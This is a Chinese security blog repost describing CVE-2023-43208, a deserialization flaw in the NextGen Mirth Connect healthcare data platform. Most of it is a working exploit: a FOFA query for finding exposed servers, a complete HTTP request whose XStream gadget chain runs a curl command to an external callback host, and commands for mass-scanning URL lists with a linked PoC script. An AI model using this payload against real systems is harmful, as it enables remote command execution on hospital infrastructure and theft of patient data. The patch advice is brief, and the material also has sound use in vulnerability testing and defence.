NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】

admin 2024年5月31日09:45:16评论23 views字数 2401阅读8分0秒阅读模式
 

fofa

title="Mirth Connect Administrator"

一、漏洞简述

Mirth Connect 是一个由医疗企业广为使用的开源数据一体化平台,允许不同系统以标准化的方式进行数据交换。用作消息传递系统中间件,该系统支持读取和写入数据库/FTP/SOAP/TCP/Local或网络共享文件/JMS/DICOM信道等。数据通过信道与至少两个端点(源和目标)交互(尽管单个源通道可以有多个目标通道),通过信道传递的数据可以使用SQL、Javascript和Java的组合进行过滤、映射、转换和路由。其接口/api/users存在CVE-2023-43208 反序列化漏洞,攻击者可通过该漏洞执行系统任意命令,从而控制该系统。

二、漏洞检测poc

POST /api/users HTTP/1.1Host: x.x.x.xX-Requested-With: OpenAPIContent-Type: application/xmlContent-Length: 2503<sorted-set>    <string>abcd</string>        <dynamic-proxy>            <interface>java.lang.Comparable</interface>            <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">              <target class="org.apache.commons.collections4.functors.ChainedTransformer">                <iTransformers>                  <org.apache.commons.collections4.functors.ConstantTransformer>                    <iConstant class="java-class">java.lang.Runtime</iConstant>                  </org.apache.commons.collections4.functors.ConstantTransformer>                  <org.apache.commons.collections4.functors.InvokerTransformer>                    <iMethodName>getMethod</iMethodName>                    <iParamTypes>                      <java-class>java.lang.String</java-class>                      <java-class>[Ljava.lang.Class;</java-class>                    </iParamTypes>                    <iArgs>                      <string>getRuntime</string>                      <java-class-array/>                    </iArgs>                  </org.apache.commons.collections4.functors.InvokerTransformer>                  <org.apache.commons.collections4.functors.InvokerTransformer>                    <iMethodName>invoke</iMethodName>                    <iParamTypes>                      <java-class>java.lang.Object</java-class>                      <java-class>[Ljava.lang.Object;</java-class>                    </iParamTypes>                    <iArgs>                      <null/>                      <object-array/>                    </iArgs>                  </org.apache.commons.collections4.functors.InvokerTransformer>                  <org.apache.commons.collections4.functors.InvokerTransformer>                    <iMethodName>exec</iMethodName>                    <iParamTypes>                      <java-class>java.lang.String</java-class>                    </iParamTypes>                    <iArgs>                      <string>curl http://test.dl24o625db2kkiihqxw5t78mpdv4jv7k.oastify.com</string>                    </iArgs>                  </org.apache.commons.collections4.functors.InvokerTransformer>                </iTransformers>              </target>              <methodName>transform</methodName>              <eventTypes>                <string>compareTo</string>              </eventTypes>        </handler>    </dynamic-proxy></sorted-set>

NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】

dnslog回显

NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

https://github.com/ATonysan/poc-exp/blob/main/NextGenMirthConnect_CVE-2023-43208_Deserialization.py

批量检测:

python NextGenMirthConnect_CVE-2023-43208_Deserialization.py -f url.txt

NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】

单个url检测漏洞:

python NextGenMirthConnect_CVE-2023-43208_Deserialization.py -u url

NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】

四、修复

官方已更新补丁,请升级至最新版本。

官网地址:https://www.nextgen.com/

原文始发于微信公众号(苏诺木安全团队):【nday】NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月31日09:45:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NextGen Mirth Connect XStream CVE-2023-43208 反序列化漏洞【附poc】https://cn-sec.com/archives/2785902.html

发表评论

匿名网友 填写信息